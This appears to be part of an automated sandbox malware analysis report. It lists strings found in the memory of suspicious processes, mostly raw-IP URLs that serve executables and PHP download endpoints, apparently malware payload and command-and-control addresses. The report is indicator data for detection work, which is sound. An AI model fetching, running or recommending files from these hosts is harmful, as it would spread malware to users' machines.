Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.c equals www.youtube.com (Youtube)

Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457084497.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1453551457.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457040379.00000000043C7000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.000000000062B000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.149:54674/vape/niko.exe
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.149:54674/vape/niko.exe7c
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.149:54674/vape/niko.exe8
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.149:54674/vape/niko.exe:t
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.149:54674/vape/niko.exe;
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.149:54674/vape/niko.exeP
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.149:54674/vape/niko.exeU
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.149:54674/vape/niko.exeings
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.149:54674/vape/niko.exeom/D
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.149:54674/vape/niko.exez
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1451806500.0000000004369000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.000000000437A000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1418845249.000000000437A000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1456849996.000000000436F000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.000000000436C000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.000000000437A000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.0000000004369000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429328334.000000000437A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.111.174.109/pelikan
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.111.174.109/pelikanK
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.159/dl.php
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002A76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.159/dl.phpV
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.159/dl.php_
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.159/dl.phpaw
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.159/dl.phpx
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.82
Source: AddInProcess32.exe, 00000005.00000002.2604784378.00000000029A3000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002994000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.00000000029C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.82/server/15/AppGate2103v15.exe
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002D19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.82/server/15/AppGate2103v15.exe$n
Source: AddInProcess32.exe, 00000005.00000002.2604784378.00000000029C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.82/server/15/AppGate2103v15.exe)
Source: AddInProcess32.exe, 00000005.00000002.2604784378.00000000029A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.82/server/15/AppGate2103v15.exet-
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.172.18
Source: explorer.exe, 00000024.00000003.2275944266.0000000011531000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://45.129.96.86:80/file/update.exe
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.42.0b
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1451806500.0000000004369000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.000000000437A000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1418845249.000000000437A000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1456849996.000000000436F000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.000000000436C000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1461461741.0000000002A65000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.000000000437A000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.0000000004369000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429328334.000000000437A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/123p.exe
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/123p.exeitdq
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1461461741.0000000002A65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/getimage15.php
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/getimage15.phpP=ce
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/getimage15.phps/Iy
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457084497.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1453551457.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457040379.00000000043C7000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/retail.php
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/retail.phphp
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/retail.phppuLp$
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/retail.phpt_
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/space.php
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/space.phpLt
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.47
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.00000000029A3000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.000000000299F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002994000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.00000000029C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.47/files/setup.exe
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.00000000029C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.47/files/setup.exe$n
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.47/files/setup.exe-
Source: explorer.exe, 00000024.00000003.2272271492.000000000C721000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000024.00000003.2273666539.000000000C721000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://66.85.156.89/
Source: explorer.exe, 00000024.00000003.2274886425.000000000C1E9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://66.85.156.89/nafdhkdf.exe
Source: explorer.exe, 00000024.00000003.2274608551.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://66.85.156.89:80/nafdhkdf.exec#
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1315897235.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.192.56.26/
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1315587677.00000000005BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.192.56.26/api/bing_release.php
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.192.56.26/api/flash.php
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.192.56.26/api/flash.phpb
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1315897235.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.192.56.26:80/api/bing_release.php
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.232/o2i3jroi23joj23ikrjokij3oroi.exe
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.232/o2i3jroi23joj23ikrjokij3oroi.exeyy
Source: svchost.exe, 00000034.00000003.1879020680.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.2019585749.000001F4D993C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS
Source: svchost.exe, 00000034.00000002.2853548341.000001F4D96A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS%3C/ds:KeyName%3E%3C/ds:KeyInfo%3E%3CCipherData%3E%3CCipherValue%3EM.C552_BAY
Source: svchost.exe, 00000034.00000003.1408056541.000001F4D8702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS</ds:KeyName></ds:Key
Source: svchost.exe, 00000034.00000002.2798278482.000001F4D8702000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1553593331.000001F4D8702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS</ds:KeyName>&ltX
Source: svchost.exe, 00000034.00000003.2366828259.000001F4D9937000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/PPCRLwssecurity-utility-1.0.xsd
Source: svchost.exe, 00000034.00000003.1960391374.000001F4D8679000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tb
Source: svchost.exe, 00000034.00000003.1503483215.000001F4D8F78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tbA
Source: svchost.exe, 00000034.00000002.2848663976.000001F4D963D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tb_
Source: svchost.exe, 00000034.00000002.2848663976.000001F4D963D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tb_com
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a-dira.net
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
